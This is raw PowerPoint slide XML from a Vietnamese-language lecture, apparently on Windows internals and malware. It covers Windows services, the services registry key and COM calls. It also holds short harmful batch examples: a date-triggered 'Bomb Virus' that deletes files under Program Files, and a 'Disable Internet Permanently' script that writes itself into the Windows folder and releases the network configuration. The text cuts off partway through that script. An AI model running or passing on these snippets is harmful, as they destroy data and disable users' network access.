            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>StartService</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Thông</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> tin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>về</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>dịch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>vụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HKLM\SYSTEM\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CurrentControlSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>\Services</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8429584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err="1" smtClean="0"/>
              <a:t>Các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>loại</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>dịch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>vụ</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>WIN32_SHARE_PROCESS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Svchost.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>WIN32_OWN_PROCESS </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>KERNEL_DRIVER </a:t>
            </a:r>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761632"/>
            <a:ext cx="6962031" cy="2947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58840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Component Object Model (COM)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>giao</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>diện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>chuẩn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>cho</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>phép</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>chương</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trình</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>mã</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>của</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>một</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>chương</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trình</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>khác</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>mà</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>không</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thông</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> tin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>về</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>chương</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trình</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>đó</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Sử</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>dụng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>cấu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>trúc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>đối</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>tượng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>cho</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>phép</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>tương</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>tác</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>với</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ngôn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ngữ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hướng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>đối</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>tượng</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Hoạt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>động</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>theo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>mô</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>hình</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> Client – Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>thông</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> qua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>bộ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>nhận</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>dạng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> Globally Unique Identifiers (GUIDs)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Class Identifiers (CLSIDs)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Interface Identifiers (IIDs)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11966876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30" y="2466057"/>
            <a:ext cx="4896542" cy="1925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97395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err="1" smtClean="0"/>
              <a:t>Cú</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>pháp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>OleInitialize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Khởi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>tạo</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>CoInitializeEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Khởi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>tạo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>CoCreateInstance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>yêu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>cầu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>truy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>cập</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> COM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>IWebBrowser2 -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Nagivate</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1778093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7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="2809350"/>
            <a:ext cx="4381500" cy="1631950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF7C8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28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6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r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&gt; Bomb Virus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>If %date% NEQ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2019/04/30 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>goto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> exit</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>del C:\Program Files\.... /y &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:exit</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exit</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6148" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-GB" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6149" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-GB" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12700" y="0"/>
            <a:ext cx="9110324" cy="2769989"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&gt;Disable Internet Permanently (bat file)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>echo @echo off&gt;c:windowswimn32.bat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echo break off&gt;&gt;c:windowswimn32.bat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echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ipconfig/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>release_all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
